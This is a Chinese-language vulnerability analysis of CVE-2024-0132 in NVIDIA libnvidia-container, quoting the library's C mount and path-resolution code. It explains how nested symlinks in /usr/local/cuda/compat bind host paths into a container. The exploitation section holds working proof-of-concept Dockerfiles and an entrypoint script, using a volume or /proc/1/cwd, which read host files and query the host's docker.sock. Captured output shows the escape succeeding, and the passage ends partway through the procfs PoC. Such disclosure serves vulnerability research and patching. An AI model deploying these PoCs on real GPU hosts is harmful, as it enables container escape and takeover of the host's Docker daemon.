        if (cnt->flags & OPT_GRAPHICS_LIBS) {
                if (ctx->dxcore.initialized)
                        log_warn("skipping app profile mount on WSL");
                elseif ((*ptr++ = mount_app_profile(&ctx->err, cnt)) == NULL)
                        goto fail;
        }

        /* Host binary and library mounts */
        if (info->bins != NULL && info->nbins > 0) {
                if ((tmp = (constchar **)mount_files(&ctx->err, ctx->cfg.root, cnt, cnt->cfg.bins_dir, info->bins, info->nbins)) == NULL)
                        goto fail;
                ptr = array_append(ptr, tmp, array_size(tmp));
                free(tmp);
        }
        if (info->libs != NULL && info->nlibs > 0) {
                if ((tmp = (constchar **)mount_files(&ctx->err, ctx->cfg.root, cnt, cnt->cfg.libs_dir, info->libs, info->nlibs)) == NULL)
                        goto fail;
                ptr = array_append(ptr, tmp, array_size(tmp));
                free(tmp);
        }
        if ((cnt->flags & OPT_COMPAT32) && info->libs32 != NULL && info->nlibs32 > 0) {
                if ((tmp = (constchar **)mount_files(&ctx->err, ctx->cfg.root, cnt, cnt->cfg.libs32_dir, info->libs32, info->nlibs32)) == NULL)
                        goto fail;
                ptr = array_append(ptr, tmp, array_size(tmp));
                free(tmp);
        }
        if (symlink_libraries(&ctx->err, cnt, mnt, (size_t)(ptr - mnt)) < 0)
                goto fail;

        /* Container library mounts */
        if (cnt->libs != NULL && cnt->nlibs > 0) {
                size_t nlibs = cnt->nlibs;
                char **libs = array_copy(&ctx->err, (constchar * const *)cnt->libs, cnt->nlibs);
                if (libs == NULL)
                        goto fail;

                filter_libraries(info, libs, &nlibs);
                if ((tmp = (constchar **)mount_files(&ctx->err, cnt->cfg.rootfs, cnt, cnt->cfg.libs_dir, libs, nlibs)) == NULL) {
                        free(libs);
                        goto fail;
                }
                ptr = array_append(ptr, tmp, array_size(tmp));
                free(tmp);
                free(libs);
        }

        /* Firmware mounts */
        for (size_t i = 0; i < info->nfirmwares; ++i) {
                if ((*ptr++ = mount_firmware(&ctx->err, ctx->cfg.root, cnt, info->firmwares[i])) == NULL) {
                        log_errf("error mounting firmware path %s", info->firmwares[i]);
                        goto fail;
                }
        }

        /* IPC mounts */
        for (size_t i = 0; i < info->nipcs; ++i) {
                /* XXX Only utility libraries require persistenced or fabricmanager IPC, everything else is compute only. */
                if (str_has_suffix(NV_PERSISTENCED_SOCKET, info->ipcs[i]) || str_has_suffix(NV_FABRICMANAGER_SOCKET, info->ipcs[i])) {
                        if (!(cnt->flags & OPT_UTILITY_LIBS))
                                continue;
                } elseif (!(cnt->flags & OPT_COMPUTE_LIBS))
                        continue;
                if ((*ptr++ = mount_ipc(&ctx->err, ctx->cfg.root, cnt, info->ipcs[i])) == NULL)
                        goto fail;
        }

        /* Device mounts */
        for (size_t i = 0; i < info->ndevs; ++i) {
                /* On WSL2 we only mount the /dev/dxg device and as such these checks are not applicable. */
                if (!ctx->dxcore.initialized) {
                        /* XXX Only compute libraries require specific devices (e.g. UVM). */
                        if (!(cnt->flags & OPT_COMPUTE_LIBS) && major(info->devs[i].id) != NV_DEVICE_MAJOR)
                                continue;
                        /* XXX Only display capability requires the modeset device. */
                        if (!(cnt->flags & OPT_DISPLAY) && minor(info->devs[i].id) == NV_MODESET_DEVICE_MINOR)
                                continue;
                }
                if (!(cnt->flags & OPT_NO_DEVBIND)) {
                        if ((*ptr++ = mount_device(&ctx->err, ctx->cfg.root, cnt, &info->devs[i])) == NULL)
                                goto fail;
                }
                if (!(cnt->flags & OPT_NO_CGROUPS)) {
                        if (setup_device_cgroup(&ctx->err, cnt, info->devs[i].id) < 0)
                                goto fail;
                }
        }
        rv = 0;

 fail:
        if (rv < 0) {
                for (size_t i = 0; mnt != NULL && i < nmnt; ++i)
                        unmount(mnt[i]);
                assert_func(ns_enter_at(NULL, ctx->mnt_ns, CLONE_NEWNS));
        } else {
                rv = ns_enter_at(&ctx->err, ctx->mnt_ns, CLONE_NEWNS);
        }

        array_free((char **)mnt, nmnt);
        return (rv);
}

2.9 挂载容器 cuda 库文件

重点分析从容器挂载到容器的操作,即cuda前向兼容特性。

根据收集到的容器内的cuda库文件cnt->libs, 经 filter_libraries 过滤,挂载到容器内。

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L767C1-L782C10

int
nvc_driver_mount(struct nvc_context *ctx, const struct nvc_container *cnt, const struct nvc_driver_info *info)
{
 ...
        /* Container library mounts */
        if (cnt->libs != NULL && cnt->nlibs > 0) {
                size_t nlibs = cnt->nlibs;
                char **libs = array_copy(&ctx->err, (constchar * const *)cnt->libs, cnt->nlibs);
                if (libs == NULL)
                        goto fail;

                filter_libraries(info, libs, &nlibs);
                if ((tmp = (constchar **)mount_files(&ctx->err, cnt->cfg.rootfs, cnt, cnt->cfg.libs_dir, libs, nlibs)) == NULL) {
                        free(libs);
                        goto fail;
                }
                ptr = array_append(ptr, tmp, array_size(tmp));
                free(tmp);
                free(libs);
        }
 ...
}

其中 cnt->libs 为容器的/usr/local/cuda/compat/lib*.so.*文件。

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_container.c#L61

static int
find_library_paths(struct error *err, struct nvc_container *cnt)
{
        char path[PATH_MAX];
        glob_t gl;
        int rv = -1;
        char **ptr;

        if (!(cnt->flags & OPT_COMPUTE_LIBS))
                return (0);

        if (path_resolve_full(err, path, cnt->cfg.rootfs, cnt->cfg.cudart_dir) < 0)
                return (-1);
        if (path_append(err, path, "compat/lib*.so.*") < 0)
                return (-1);

        if (xglob(err, path, GLOB_ERR, NULL, &gl) < 0)
                goto fail;
        if (gl.gl_pathc > 0) {
                cnt->nlibs = gl.gl_pathc;
                cnt->libs = ptr = array_new(err, gl.gl_pathc);
                if (cnt->libs == NULL)
                        goto fail;

                for (size_t i = 0; i < gl.gl_pathc; ++i) {
                        if (path_resolve(err, path, cnt->cfg.rootfs, gl.gl_pathv[i] + strlen(cnt->cfg.rootfs)) < 0)
                                goto fail;
                        if (!str_array_match(path, (constchar * const *)cnt->libs, (size_t)(ptr - cnt->libs))) {
                                log_infof("selecting %s%s", cnt->cfg.rootfs, path);
                                if ((*ptr++ = xstrdup(err, path)) == NULL)
                                        goto fail;
                        }
                }
                array_pack(cnt->libs, &cnt->nlibs);
        }
        rv = 0;

 fail:
        globfree(&gl);
        return (rv);
}

filter_libraries 函数主要过滤出满足以下条件的库,才执行挂载:

  1. 文件名中要有 .so.
  2. 与主机cuda库版本号不匹配

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L562

static void
filter_libraries(const struct nvc_driver_info *info, char * paths[], size_t *size)
{
        char *lib, *maj;

        /*
         * XXX Filter out any library that matches the major version of RM to prevent us from
         * running into an unsupported configurations (e.g. CUDA compat on Geforce or non-LTS drivers).
         */

        for (size_t i = 0; i < *size; ++i) {
                lib = basename(paths[i]);
                if ((maj = strstr(lib, ".so.")) != NULL) {
                        maj += strlen(".so.");
                        if (strncmp(info->nvrm_version, maj, strspn(maj, "0123456789")))
                                continue;
                }
                paths[i] = NULL;
        }
        array_pack(paths, size);
}

3. 漏洞分析

3.1 漏洞点分析

首先让我们预设漏洞效果: 可以从主机挂载任意文件到容器。要达到这样的效果,条件是挂载的源地址要可控。

根据章节“2. 调用链分析”,cuda前向兼容特性提供了这样一个机会:从容器挂载文件到容器。

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L767C1-L782C10

int
nvc_driver_mount(struct nvc_context *ctx, const struct nvc_container *cnt, const struct nvc_driver_info *info)
{
 ...
        /* Container library mounts */
        if (cnt->libs != NULL && cnt->nlibs > 0) {
                size_t nlibs = cnt->nlibs;
                char **libs = array_copy(&ctx->err, (constchar * const *)cnt->libs, cnt->nlibs);
                if (libs == NULL)
                        goto fail;

                filter_libraries(info, libs, &nlibs);
                if ((tmp = (constchar **)mount_files(&ctx->err, cnt->cfg.rootfs, cnt, cnt->cfg.libs_dir, libs, nlibs)) == NULL) {
                        free(libs);
                        goto fail;
                }
                ptr = array_append(ptr, tmp, array_size(tmp));
                free(tmp);
                free(libs);
        }
 ...
}

令libs路径为指向主机目录的软链接,如果后续没有防护措施,则可能达成漏洞效果。

挂载时没有什么防护,只有一个要满足match_binary_flags()的要求。

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L100

static char **
mount_files(struct error *err, const char *root, const struct nvc_container *cnt, const char *dir, char *paths[], size_t size)
{
        char src[PATH_MAX];
        char dst[PATH_MAX];
        mode_t mode;
        char *src_end, *dst_end, *file;
        char **mnt, **ptr;

        if (path_new(err, src, root) < 0)
                return (NULL);
        if (path_resolve_full(err, dst, cnt->cfg.rootfs, dir) < 0)
                return (NULL);
        if (file_create(err, dst, NULL, cnt->uid, cnt->gid, MODE_DIR(0755)) < 0)
                return (NULL);
        src_end = src + strlen(src);
        dst_end = dst + strlen(dst);

        mnt = ptr = array_new(err, size + 1); /* NULL terminated. */
        if (mnt == NULL)
                return (NULL);

        for (size_t i = 0; i < size; ++i) {
                file = basename(paths[i]);
                if (!match_binary_flags(file, cnt->flags) && !match_library_flags(file, cnt->flags))
                        continue;
                if (path_append(err, src, paths[i]) < 0)
                        goto fail;
                if (path_append(err, dst, file) < 0)
                        goto fail;
                if (file_mode(err, src, &mode) < 0)
                        goto fail;
                if (file_create(err, dst, NULL, cnt->uid, cnt->gid, mode) < 0)
                        goto fail;

                log_infof("mounting %s at %s", src, dst);
                if (xmount(err, src, dst, NULL, MS_BIND, NULL) < 0)
                        goto fail;
                if (xmount(err, NULL, dst, NULL, MS_BIND|MS_REMOUNT | MS_RDONLY|MS_NODEV|MS_NOSUID, NULL) < 0)
                        goto fail;
                if ((*ptr++ = xstrdup(err, dst)) == NULL)
                        goto fail;
                *src_end = '';
                *dst_end = '';
        }
        return (mnt);

 fail:
        for (size_t i = 0; i < size; ++i)
                unmount(mnt[i]);
        array_free(mnt, size);
        return (NULL);
}

那么,剩下来的事情就很简单了:

  1. 找到哪些文件是"libs" => find_library_paths()filter_libraries()
  2. 修改目标文件为指向主机文件的软链接,使得将来挂载时将主机文件挂载到容器
  3. 符合 match_binary_flags() 或match_library_flags() 要求
  4. 最终执行到挂载命令

3.2 数据格式分析

分析 find_library_paths()filter_libraries()match_binary_flags()match_library_flags()的限制。

3.2.1 find_library_paths()

TLDR;

  1. 利用路径为容器的 /usr/local/cuda/compat/lib.*.so.* 路径
  2. 解析软链接后添加到 cnt->libs
  3. 注意:此时没有加入容器的mount namespace

find_library_paths() 函数默认在容器rootfs /usr/local/cuda/compat/lib.*.so.* 查找 libs。

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_container.c#L73

static int
find_library_paths(struct error *err, struct nvc_container *cnt)
{
        char path[PATH_MAX];
        glob_t gl;
        int rv = -1;
        char **ptr;

        if (!(cnt->flags & OPT_COMPUTE_LIBS))
                return (0);

        if (path_resolve_full(err, path, cnt->cfg.rootfs, cnt->cfg.cudart_dir) < 0)
                return (-1);
        if (path_append(err, path, "compat/lib*.so.*") < 0)
                return (-1);

        if (xglob(err, path, GLOB_ERR, NULL, &gl) < 0)
                goto fail;
        if (gl.gl_pathc > 0) {
  ...
        }
        rv = 0;

 fail:
        globfree(&gl);
        return (rv);
}

对目标路径执行一次解析软链接,如果目标是软链接要能解析成功,将解析后的路径加入到 cnt->libs。

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_container.c#L85

static int
find_library_paths(struct error *err, struct nvc_container *cnt)
{
 ...
        if (gl.gl_pathc > 0) {
                cnt->nlibs = gl.gl_pathc;
                cnt->libs = ptr = array_new(err, gl.gl_pathc);
                if (cnt->libs == NULL)
                        goto fail;

                for (size_t i = 0; i < gl.gl_pathc; ++i) {
                        if (path_resolve(err, path, cnt->cfg.rootfs, gl.gl_pathv[i] + strlen(cnt->cfg.rootfs)) < 0)
                                goto fail;
                        if (!str_array_match(path, (constchar * const *)cnt->libs, (size_t)(ptr - cnt->libs))) {
                                log_infof("selecting %s%s", cnt->cfg.rootfs, path);
                                if ((*ptr++ = xstrdup(err, path)) == NULL)
                                        goto fail;
                        }
                }
                array_pack(cnt->libs, &cnt->nlibs);
        }
 ...
}

do_path_resolve 会根据 '/' 来分段, 并解析每一段路径中的软链接,对于不存在的路径,则保持原样。

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/utils.c#L802

static int
do_path_resolve(struct error *err, bool full, char *buf, const char *root, const char *path)
{
        int fd = -1;
        int rv = -1;
        char realpath[PATH_MAX];
        char dbuf[2][PATH_MAX];
        char *link = dbuf[0];
        char *ptr = dbuf[1];
        char *file, *p;
        unsignedint noents = 0;
        unsignedint nlinks = 0;
        ssize_t n;

        *ptr = '';
        *realpath = '';
        assert(*root == '/');

        if ((fd = open_next(err, -1, root)) < 0)
                goto fail;
        if (path_append(err, ptr, path) < 0)
                goto fail;

        while ((file = strsep(&ptr, "/")) != NULL) {
                if (*file == '' || str_equal(file, "."))
                        continue;
                elseif (str_equal(file, "..")) {
                        /*
                         * Remove the last component from the resolved path. If we are not below
                         * non-existent components, restore the previous file descriptor as well.
                         */

                        if ((p = strrchr(realpath, '/')) == NULL) {
                                error_setx(err, "path error: %s resolves outside of %s", path, root);
                                goto fail;
                        }
                        *p = '';
                        if (noents > 0)
                                --noents;
                        else {
                                if ((fd = open_next(err, fd, "..")) < 0)
                                        goto fail;
                        }
                } else {
                        if (noents > 0)
                                goto missing_ent;

                        n = readlinkat(fd, file, link, PATH_MAX);
                        if (n > 0 && n < PATH_MAX && nlinks < MAXSYMLINKS) {
                                /*
                                 * Component is a symlink, append the rest of the path to it and
                                 * proceed with the resulting buffer. If it is absolute, also clear
                                 * the resolved path and reset our file descriptor to root.
                                 */

                                link[n] = '';
                                if (*link == '/') {
                                        ++link;
                                        *realpath = '';
                                        if ((fd = open_next(err, fd, root)) < 0)
                                                goto fail;
                                }
                                if (ptr != NULL) {
                                        if (path_append(err, link, ptr) < 0)
                                                goto fail;
                                }
                                ptr = link;
                                link = dbuf[++nlinks % 2];
                        } else {
                                if (n >= PATH_MAX)
                                        errno = ENAMETOOLONG;
                                elseif (nlinks >= MAXSYMLINKS)
                                        errno = ELOOP;
                                switch (errno) {
                                missing_ent:
                                case ENOENT:
                                        /* Component doesn't exist */
                                        ++noents;
                                        if (path_append(err, realpath, file) < 0)
                                                goto fail;
                                        break;
                                case EINVAL:
                                        /* Not a symlink, proceed normally */
                                        if ((fd = open_next(err, fd, file)) < 0)
                                                goto fail;
                                        if (path_append(err, realpath, file) < 0)
                                                goto fail;
                                        break;
                                default:
                                        error_set(err, "path error: %s/%s", root, path);
                                        goto fail;
                                }
                        }
                }
        }

        if (!full) {
                if (path_new(err, buf, realpath) < 0)
                        goto fail;
        } else {
                if (path_join(err, buf, root, realpath) < 0)
                        goto fail;
        }
        rv = 0;

 fail:
        xclose(fd);
        return (rv);
}

int
path_resolve(struct error *err, char *buf, const char *root, const char *path)
{
        return (do_path_resolve(err, false, buf, root, path));
}

需要注意的是:

  1. find_library_paths 函数执行时,还没有加入到容器的mount namespace
  2. 未来具体挂载时,nvc_driver_mount 函数执行时会加入容器的mount namespace

因此,可利用这个特点来触发程序执行的差异。即,某个路径在 find_library_paths 中解析软链接时表现为文件不存在,无法解析软链接; 而在 nvc_driver_mount 中解析软链接时,可以成功解析软链接。

3.2.2 filter_libraries()

filter_libraries() 从每个 lib 名称中提取出版本号,要求lib版本号与 nvrm_version 不同。因为如果相同,就没有必要再挂载一次了。

只需要随意编造一个版本号,即可绕过该限制。

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L562

static void
filter_libraries(const struct nvc_driver_info *info, char * paths[], size_t *size)
{
        char *lib, *maj;

        /*
         * XXX Filter out any library that matches the major version of RM to prevent us from
         * running into an unsupported configurations (e.g. CUDA compat on Geforce or non-LTS drivers).
         */

        for (size_t i = 0; i < *size; ++i) {
                lib = basename(paths[i]);
                if ((maj = strstr(lib, ".so.")) != NULL) {
                        maj += strlen(".so.");
                        if (strncmp(info->nvrm_version, maj, strspn(maj, "0123456789")))
                                continue;
                }
                paths[i] = NULL;
        }
        array_pack(paths, size);
}
3.2.3 match_binary_flags()match_library_flags()

TLDR;

  1. 设置环境变量 NVIDIA_DRIVER_CAPABILITIES=all 以跳过关于 flags & OPT_XX 的判断。
  2. bin/library文件的前缀在预设范围内。

要求bin/library文件的前缀在预设范围内。

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_info.c#L755

bool
match_binary_flags(const char *bin, int32_t flags)
{
        if ((flags & OPT_UTILITY_BINS) && str_array_match_prefix(bin, utility_bins, nitems(utility_bins)))
                return (true);
        if ((flags & OPT_COMPUTE_BINS) && str_array_match_prefix(bin, compute_bins, nitems(compute_bins)))
                return (true);
        return (false);
}

bool
match_library_flags(const char *lib, int32_t flags)
{
        if (str_array_match_prefix(lib, dxcore_libs, nitems(dxcore_libs)))
                return (true);
        if ((flags & OPT_UTILITY_LIBS) && str_array_match_prefix(lib, utility_libs, nitems(utility_libs)))
                return (true);
        if ((flags & OPT_COMPUTE_LIBS) && str_array_match_prefix(lib, compute_libs, nitems(compute_libs)))
                return (true);
        if ((flags & OPT_VIDEO_LIBS) && str_array_match_prefix(lib, video_libs, nitems(video_libs)))
                return (true);
        if ((flags & OPT_GRAPHICS_LIBS) && (str_array_match_prefix(lib, graphics_libs, nitems(graphics_libs)) ||
            str_array_match_prefix(lib, graphics_libs_glvnd, nitems(graphics_libs_glvnd)) ||
            str_array_match_prefix(lib, graphics_libs_compat, nitems(graphics_libs_compat))))
                return (true);
        if ((flags & OPT_NGX_LIBS) && str_array_match_prefix(lib, ngx_libs, nitems(ngx_libs)))
                return (true);
        return (false);
}

其中,flags可以通过环境变量NVIDIA_DRIVER_CAPABILITIES来控制, 设置为NVIDIA_DRIVER_CAPABILITIES=all开启全部 driver capability。

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/options.h#L82-L87

static const struct option container_opts[] = {
        ...
        {"utility", OPT_UTILITY_BINS|OPT_UTILITY_LIBS},
        {"compute", OPT_COMPUTE_BINS|OPT_COMPUTE_LIBS},
        {"video", OPT_VIDEO_LIBS|OPT_COMPUTE_LIBS},
        {"graphics", OPT_GRAPHICS_LIBS},
        {"display", OPT_DISPLAY|OPT_GRAPHICS_LIBS},
        {"ngx", OPT_NGX_LIBS},
        ...
};

预设的前缀包括:

https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_info.c#L60

static constchar * const utility_bins[] = {
        "nvidia-smi",                       /* System management interface */
        "nvidia-debugdump",                 /* GPU coredump utility */
        "nvidia-persistenced",              /* Persistence mode utility */
        "nv-fabricmanager",                 /* NVSwitch fabric manager utility */
        //"nvidia-modprobe",                /* Kernel module loader */
        //"nvidia-settings",                /* X server settings */
        //"nvidia-xconfig",                 /* X xorg.conf editor */
};

staticconstchar * const compute_bins[] = {
        "nvidia-cuda-mps-control",          /* Multi process service CLI */
        "nvidia-cuda-mps-server",           /* Multi process service server */
};

staticconstchar * const utility_libs[] = {
        "libnvidia-ml.so",                  /* Management library */
        "libnvidia-cfg.so",                 /* GPU configuration */
        "libnvidia-nscq.so",                /* Topology info for NVSwitches and GPUs */
};

staticconstchar * const compute_libs[] = {
        "libcuda.so",                       /* CUDA driver library */
        "libcudadebugger.so",               /* CUDA Debugger Library */
        "libnvidia-opencl.so",              /* NVIDIA OpenCL ICD */
        "libnvidia-gpucomp.so",             /* Shared Compiler Library */
        "libnvidia-ptxjitcompiler.so",      /* PTX-SASS JIT compiler (used by libcuda) */
        "libnvidia-fatbinaryloader.so",     /* fatbin loader (used by libcuda) */
        "libnvidia-allocator.so",           /* NVIDIA allocator runtime library */
        "libnvidia-compiler.so",            /* NVVM-PTX compiler for OpenCL (used by libnvidia-opencl) */
        "libnvidia-pkcs11.so",              /* Encrypt/Decrypt library */
        "libnvidia-pkcs11-openssl3.so",     /* Encrypt/Decrypt library (OpenSSL 3 support) */
        "libnvidia-nvvm.so",                /* The NVVM Compiler library */
};

staticconstchar * const video_libs[] = {
        "libvdpau_nvidia.so",               /* NVIDIA VDPAU ICD */
        "libnvidia-encode.so",              /* Video encoder */
        "libnvidia-opticalflow.so",         /* NVIDIA Opticalflow library */
        "libnvcuvid.so",                    /* Video decoder */
};

staticconstchar * const graphics_libs[] = {
        //"libnvidia-egl-wayland.so",       /* EGL wayland platform extension (used by libEGL_nvidia) */
        "libnvidia-eglcore.so",             /* EGL core (used by libGLES*[_nvidia] and libEGL_nvidia) */
        "libnvidia-glcore.so",              /* OpenGL core (used by libGL or libGLX_nvidia) */
        "libnvidia-tls.so",                 /* Thread local storage (used by libGL or libGLX_nvidia) */
        "libnvidia-glsi.so",                /* OpenGL system interaction (used by libEGL_nvidia) */
        "libnvidia-fbc.so",                 /* Framebuffer capture */
        "libnvidia-ifr.so",                 /* OpenGL framebuffer capture */
        "libnvidia-rtcore.so",              /* Optix */
        "libnvoptix.so",                    /* Optix */
};

staticconstchar * const graphics_libs_glvnd[] = {
        //"libGLX.so",                      /* GLX ICD loader */
        //"libOpenGL.so",                   /* OpenGL ICD loader */
        //"libGLdispatch.so",               /* OpenGL dispatch (used by libOpenGL, libEGL and libGLES*) */
        "libGLX_nvidia.so",                 /* OpenGL/GLX ICD */
        "libEGL_nvidia.so",                 /* EGL ICD */
        "libGLESv2_nvidia.so",              /* OpenGL ES v2 ICD */
        "libGLESv1_CM_nvidia.so",           /* OpenGL ES v1 common profile ICD */
        "libnvidia-glvkspirv.so",           /* SPIR-V Lib for Vulkan */
        "libnvidia-cbl.so",                 /* VK_NV_ray_tracing */
};

staticconstchar * const graphics_libs_compat[] = {
        "libGL.so",                         /* OpenGL/GLX legacy _or_ compatibility wrapper (GLVND) */
        "libEGL.so",                        /* EGL legacy _or_ ICD loader (GLVND) */
        "libGLESv1_CM.so",                  /* OpenGL ES v1 common profile legacy _or_ ICD loader (GLVND) */
        "libGLESv2.so",                     /* OpenGL ES v2 legacy _or_ ICD loader (GLVND) */
};

staticconstchar * const ngx_libs[] = {
        "libnvidia-ngx.so",                 /* NGX library */
};

staticconstchar * const dxcore_libs[] = {
        "libdxcore.so",                     /* Core library for dxcore support */
};

3.3 漏洞利用

总结“3.1 漏洞点分析”、“3.2 数据格式分析”节,漏洞利用需要达成的条件为:

  1. 在容器的 /usr/local/cuda/compat/lib.*.so.* 路径设置软链接, 注意 find_library_paths() 函数中会进行软链接解析再返回路径
  2. 文件名满足要求:(1)包含.so.; (2)版本号与nvrm_version不同
  3. mount前,校验文件名符合特定前缀

欲达成逃逸类危害,需要在mount时,控制挂载源路径为主机路径。则漏洞利用步骤为:

  1. 在容器的 /usr/local/cuda/compat/lib.*.so.* 路径设置软链接
  2. 加入容器的mount namespace
  3. 文件名满足要求:(1)包含.so.; (2)版本号与nvrm_version不同
  4. mount前,校验文件名符合特定前缀
  5. mount时,挂载源路径为主机路径,mount本身会解析软链接,实现将主机路径挂载到容器。注意挂载以只读模式挂载

为满足步骤5,软链接应指向主机路径,但无法满足步骤2,3的要求。因此需要2层软链接, 例如:

/usr/local/cuda/compat/libssst0n3.so.1 -> /?/libnvidia-ml.so.999 -> /HOST

  1. /usr/local/cuda/compat/libssst0n3.so.1 -> /?/libnvidia-ml.so.999 满足步骤1,2,3,4要求
  2. /?/libnvidia-ml.so.999 -> /HOST 满足步骤5要求

但实际 find_library_paths() 函数调用 do_path_resolve() 函数进行软链接解析时,可能导致软链接被直接解析为 /X 而导致无法满足步骤2,3,4要求。

如何同时满足是主要待解决的难题,即如何实现:

  1. do_path_resolve()解析软链接为 /?/libnvidia-ml.so.999
  2. mount 解析软链接为 /HOST

如何达成?有以下两种思路:

  1. 构造不存在的路径,使得第一次解析中断: do_path_resolve()遇到不存在的路径时会原样输出路径
  2. 条件竞争:两个容器共享目录,通过条件竞争动态修改软链接目标路径

条件竞争是比较容易达成目标的,但会导致需要一个严格的漏洞利用条件。继续确认第1个思路的可行性。

注意到步骤一执行时未加入容器的mount namespace,则有三种方式来构造不存在的路径

  1. (ssst0n3) 挂载卷: /usr/local/cuda/compat/libssst0n3.so.1 -> /volume/libnvidia-ml.so.999 -> /
  2. (ssst0n3) procfs: /usr/local/cuda/compat/libssst0n3.so.1 -> /proc/?/libnvidia-ml.so.999 -> /
  3. (ym) 分别设置目录和文件来构造两次挂载: /usr/local/cuda/compat/libnvidia-cfg.so.111/libnvidia-cfg.so.112 -> //usr/local/cuda/compat/libnvidia-cfg.so.113 -> /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.111/libnvidia-cfg.so.112

对于前两种方式(挂载卷、procfs):

  1. 在进入容器 mount namespace 之前,容器 rootfs 下的 /volume/proc 会是空目录,满足步骤1,2,3,4要求。
  2. 进入容器 mount namespace 之后,/volume/proc挂载点可见,其下将存在软链接。

对于第三种方式(构造2次挂载):

  1. find_library_paths首先查找完所有的待处理路径,再统一执行挂载,因此可通过构造两次挂载,使第一次挂载改变第二次挂载的目录环境。
  2. find_library_paths所查找的路径包含目录。
  3. 在执行挂载动作前,/usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.111/ 目录不存在,满足步骤1,2,3,4要求。
  4. 在挂载目录 /usr/local/cuda/compat/libnvidia-cfg.so.111 后,/usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.111/libnvidia-cfg.so.112 是指向主机的软链接。
3.3.1 volume 方法
  1. 构造软链接: /usr/local/cuda/compat/libssst0n3.so.1 -> /volume/libnvidia-ml.so.999
  2. 容器启动时,通过-v参数挂载卷进来,其中卷里包含一个软链接 /volume/libnvidia-ml.so.999 -> /

完整 poc 如下:

root@wanglei-gpu:~/poc# ls
Dockerfile  entrypoint.sh  volume
root@wanglei-gpu:~/poc# cat Dockerfile 
FROM ubuntu

RUN apt update && apt install curl -y

WORKDIR /usr/local/cuda/compat

RUN ln -s /volume/libnvidia-ml.so.1 libnvidia-smi-ssst0n3.so.999 &&
    ln -s /usr/lib/x86_64-linux-gnu/libnvidia-ml.so.1 /host

RUN ln -s /volume/libnvidia-cfg.so.1 libnvidia-smi-ssst0n3.so.9999 &&
    ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.1 /host-run

COPY entrypoint.sh /

# for nvidia-container-toolkit <= v1.3.0, no need for > v1.3.0
ENV NVIDIA_DRIVER_CAPABILITIES=all

CMD /entrypoint.sh
root@wanglei-gpu:~/poc# cat entrypoint.sh 
#!/bin/bash
set -x
#echo '[+] mounted host files'
#echo '[+] reading /etc/hostname'
cat /host/etc/hostname
#echo 'mounted docker.sock; reading containers'
curl --unix-socket /host-run/docker.sock http://localhost/containers/json

root@wanglei-gpu:~/poc# ls -lah volume/
total 8.0K
drwxr-xr-x 2 root root 4.0K Dec 12 22:09 .
drwxr-xr-x 3 root root 4.0K Dec 12 22:08 ..
lrwxrwxrwx 1 root root    4 Dec 12 22:09 libnvidia-cfg.so.1 -> /run
lrwxrwxrwx 1 root root    1 Dec 12 22:02 libnvidia-ml.so.1 -> /
root@wanglei-gpu:~/poc# docker build -t ssst0n3/poc-cve-2024-0132:volume .
root@wanglei-gpu:~/poc# docker run -ti --runtime=nvidia --gpus=all -v $(pwd)/volume:/volume ssst0n3/poc-cve-2024-0132:volume
+ cat /host/etc/hostname
wanglei-gpu
+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json
[{"Id":"ad772936a25e694562d7f9f5378b8489981910442be2cd2953e5ca7a0aa022bd","Names":["/great_mayer"],"Image":"ssst0n3/poc-cve-2024-0132:volume","ImageID":"sha256:f416b61ba4d3c81d461f9be06faa60e754577f39fe5ca783dc68ae8ec8dc6b5d","Command":"/bin/sh -c /entrypoint.sh","Created":1734012735,"Ports":[],"Labels":{"org.opencontainers.image.ref.name":"ubuntu","org.opencontainers.image.version":"24.04"},"State":"running","Status":"Up Less than a second","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"6606e3b1ff3d29c359eed1804e08b6282ca905b13b579cc48f81575da5e4396b","EndpointID":"3fc07f3e7a9ba4a6ead11fddaf306af818d6994e86cab1783a4134a1b1adb846","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[{"Type":"bind","Source":"/root/poc/volume","Destination":"/volume","Mode":"","RW":true,"Propagation":"rprivate"}]}]

实现了漏洞的利用,但是要求使用挂载卷,下面一节将通过procfs来巧妙地实现无需挂载卷利用。

3.3.2 procfs 方法

容器rootfs下/proc/1 是runc init进程的相关文件,/proc/1/cwd 指向容器的rootfs。

  1. 构造软链接: /usr/local/cuda/compat/libssst0n3.so.1 -> /proc/1/cwd/libnvidia-ml.so.999
  2. 构造软链接: /libnvidia-ml.so.999 -> /

完整PoC如下, 达到了比较理想的利用效果:

root@wanglei-gpu:~/poc-procfs# cat Dockerfile 
FROM ubuntu

RUN apt update && apt install curl -y

WORKDIR /usr/local/cuda/compat

RUN ln -s /proc/1/cwd/usr/lib/libnvidia-ml.so.1 libnvidia-smi-ssst0n3.so.999 &&
    ln -s / /usr/lib/libnvidia-ml.so.1 &&
    ln -s /usr/lib/x86_64-linux-gnu/libnvidia-ml.so.1 /host

RUN ln -s /proc/1/cwd/usr/lib64/libnvidia-cfg.so.1 libnvidia-smi-ssst0n3.so.9999 &&
    ln -s /run /usr/lib64/libnvidia-cfg.so.1 &&
    ln -s /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.1 /host-run

COPY entrypoint.sh /

# for nvidia-container-toolkit <= v1.3.0, no need for > v1.3.0
